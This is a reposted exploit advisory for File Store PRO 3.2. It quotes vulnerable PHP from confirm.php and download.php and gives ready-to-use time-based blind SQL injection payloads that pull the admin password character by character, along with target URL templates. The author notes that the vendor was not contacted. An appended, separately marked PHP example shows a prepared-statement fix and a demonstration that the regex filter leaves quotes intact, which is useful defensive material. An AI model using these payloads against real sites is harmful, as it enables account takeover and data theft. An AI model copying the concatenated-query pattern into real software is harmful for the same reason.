File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

2023-12-07

| File Store PRO 3.2 Blind SQL Injection |

|________________________________________|

Download from: http://upoint.info/cgi/demo/fs/filestore.zip

- Needs admin rights:

/confirm.php:

    if(isset($_GET["folder"]) && $_GET["folder"]!="") {
        $folder=$_GET["folder"];
    } else {
        exit("Bad Request");
    }
    if(isset($_GET["id"]) && $_GET["id"]!="") {
        $id=$_GET["id"];
    } else {
        exit("Bad Request");
    }

    // Validate all inputs
    // Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/
    /********************** SepedaTua ****************************/
    /* Fields:
       $folder
       $id
    */
    $search = array ('@<script[^>]*?>.*?</script>@si',
                     '@<[\/\!]*?[^<>]*?>@si',
                     '@([\r\n])[\s]+@',
                     '@&(quot|#34);@i',
                     '@&(amp|#38);@i',
                     '@&(lt|#60);@i',
                     '@&(gt|#62);@i',
                     '@&(nbsp|#160);@i',
                     '@&(iexcl|#161);@i',
                     '@&(cent|#162);@i',
                     '@&(pound|#163);@i',
                     '@&(copy|#169);@i',
                     '@&#(\d+);@e');
    $replace = array ('',
                      '',
                      '\1',
                      '"',
                      '&',
                      '<',
                      '>',
                      ' ',
                      chr(161),
                      chr(162),
                      chr(163),
                      chr(169),
                      'chr(\1)');
    $ffolder = $folder;
    $fid = $id;
    // None of the patterns above touch quote characters, so a ' in $id
    // survives the "validation" and lands unescaped in the query below.
    $folder = preg_replace($search, $replace, $folder);
    $id = preg_replace($search, $replace, $id);

-----

    $SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
    $SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
    $SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
    if(!$mysql->query($SQL))
    {
        exit($mysql->error);
    }
    if($mysql->num<=0)
    {
        exit("Record not found");
    }

POC:

' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin

Site: http://site.xxx/confirm.php?folder=a&id=[SQL]

- Does not need admin rights:

In /download.php:

    if(!isset($_GET["sig"])) // direct download, no need to login
        $MustLogin=1|2|4;
    require_once("libs/header.php");
    if(!isset($_GET["sig"])) // direct download, no need to login
        $userlevel=$CurUser->getlevel();
    $SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
    if(!$mysql->query($SQL))
    {
        exit($mysql->error);
    }

POC:

' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin

Site: http://site.xxx/download.php?id=[SQL]

Requires magic_quotes_gpc=off. Vendor not contacted!
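Added example, not code from the advisory or from File Store PRO: the same `id` lookup used by confirm.php and download.php, once in its concatenated form and once with an integer check plus a mysqli prepared statement, together with a small demonstration that the SepedaTua regex filter leaves quote characters untouched. It assumes `fstore_` as the table prefix (the one visible in the PoC) and an already-open mysqli connection `$db`.

```php
<?php
// Added example (not from the advisory or File Store PRO). Assumptions:
// DB_PREFIX is "fstore_" (the prefix seen in the PoC) and $db is an open
// mysqli connection created elsewhere.
define('DB_PREFIX', 'fstore_');

// The SepedaTua filter from confirm.php (non-/e patterns only): it strips
// tags and decodes a few entities but never escapes ' or ", so a quote
// reaches the SQL string unchanged.
function filestore_filter(string $value): string
{
    $search  = array('@<script[^>]*?>.*?</script>@si',
                     '@<[\/\!]*?[^<>]*?>@si',
                     '@&(quot|#34);@i',
                     '@&(amp|#38);@i');
    $replace = array('', '', '"', '&');
    return preg_replace($search, $replace, $value);
}

// Vulnerable shape, as in confirm.php and download.php: the (filtered or
// unfiltered) value is concatenated straight into the quoted literal.
function build_vulnerable_sql(string $id): string
{
    return "SELECT * FROM `" . DB_PREFIX . "file_list` WHERE `id`='" . $id . "'";
}

// Hardened lookup: accept only a decimal integer id and bind it as a
// parameter, so the value is never parsed as part of the SQL text.
function fetch_file_safe(mysqli $db, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null;                     // equivalent of exit("Bad Request")
    }
    $stmt = $db->prepare("SELECT * FROM `" . DB_PREFIX . "file_list` WHERE `id`=?");
    $idInt = (int) $id;
    $stmt->bind_param('i', $idInt);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Constructed probe: a valid id followed by a lone quote. The filter passes
// it through, the concatenated query is broken, the integer check rejects it.
$probe = filestore_filter("12'");
echo "filtered value : ", $probe, "\n";
echo "concatenated   : ", build_vulnerable_sql($probe), "\n";
echo "ctype_digit    : ", ctype_digit($probe) ? 'accepted' : 'rejected', "\n";
```

Because the hardened path binds the id as an integer parameter, the `magic_quotes_gpc` setting the advisory mentions no longer matters for this query.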

--------------------------------------------------------------------

Site: http://rstcenter.com

Site: http://de-ce.net

Good luck!

--------------------------------------------------------------------

Source: https://www.u-9.cn/security/exploit/124322.html
